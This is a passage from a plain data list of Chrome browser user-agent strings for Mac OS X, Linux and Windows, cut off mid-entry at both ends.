Gecko) Chrome/13.0.782.41 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.698.0 Safari/534.24\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.790.0 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.813.0 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.68 Safari/534.30\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.11 Safari/535.19\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.0 Safari/534.24\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.794.0 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.803.0 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.834.0 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/19.0.1055.1 Safari/535.24\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.22 (KHTML, like Gecko) Chrome/19.0.1047.0 Safari/535.22\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1290.1 Safari/537.13\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.6 Safari/537.11\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.13 (KHTML, like Gecko) Chrome/24.0.1290.1 Safari/537.13\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36\nMozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36\nMozilla/5.0 (Macintosh; PPC Mac OS X 10_6_7) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.790.0 Safari/535.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/ Safari/530.6\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.9 (KHTML, like Gecko) Chrome/ Safari/530.9\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.192 Safari/531.3\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.212.1 Safari/532.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.210.0 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.2 Safari/532.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.343.0 Safari/533.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.422.0 Safari/534.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.453.1 Safari/534.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.2 Safari/528.10\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.4 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.212.1 Safari/532.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.11 Safari/532.9\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.209.0 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.343.0 Safari/533.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.366.0 Safari/533.4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.363.0 Safari/533.3\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.366.0 Safari/533.4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.453.1 Safari/534.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.456.0 Safari/534.3\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.7 Safari/533.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.210 Safari/534.10\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.0 Safari/534.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.655.0 Safari/534.17\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.414.0 Safari/534.1\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.451.0 Safari/534.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.461.0 Safari/534.3\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; fr-FR) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.639.0 Safari/534.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.660.0 Safari/534.18\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.125 Safari/533.4\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.7 Safari/533.2\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21\nMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_8; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5\nMozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4\nMozilla/5.0 (Macintosh; U; Mac OS X 10_5_7; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5\nMozilla/5.0 (Macintosh; U; Mac OS X 10_6_1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5\nMozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/11.0.696.50\nMozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/12.0.742.91\nMozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41\nMozilla/5.0 (Windows 8) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30\nMozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36\nMozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.43 Safari/534.24\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.700.3 Safari/534.24\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/534.25 (KHTML, like Gecko) Chrome/12.0.704.0 Safari/534.25\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/534.25 (KHTML, like Gecko) Chrome/12.0.706.0 Safari/534.25\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.809.0 Safari/535.1\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.810.0 Safari/535.1\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.813.0 Safari/535.1\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.815.0 Safari/535.1\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.860.0 Safari/535.2\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.864.0 Safari/535.2\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.872.0 Safari/535.2\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.6 Safari/537.11\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36\nMozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36\nMozilla/5.0 (Windows NT 5.2) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.112 Safari/534.30\nMozilla/5.0 (Windows NT 5.2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1\nMozilla/5.0 (Windows NT 5.2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.794.0 Safari/535.1\nMozilla/5.0 (Windows NT 5.2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.813.0 Safari/535.1\nMozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1\nMozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7\nMozilla/5.0 (Windows NT 6.0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24\nMozilla/5.0 (Windows NT 6.0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30\nMozilla/5.0 (Windows NT 6.0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11\nMozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.1 Safari/535.1\nMozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1\nMozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1\nMozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1\nMozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.792.0 Safari/535.1\nMozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2\nMozilla/5.0 (Windows NT 6.0) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7\nMozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5\nMozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24\nMozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24\nMozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\nMozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11\nMozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.45 Safari/535.19\nMozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1\nMozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1\nMozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7\nMozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7\nMozilla/5.0 (Windows NT 6.0) yi; AppleWebKit/345667.12221 (KHTML, like Gecko) Chrome/23.0.1271.26 Safari/453667.1221\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.694.0 Safari/534.24\nMozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24\nMozilla/5.0 (Windows 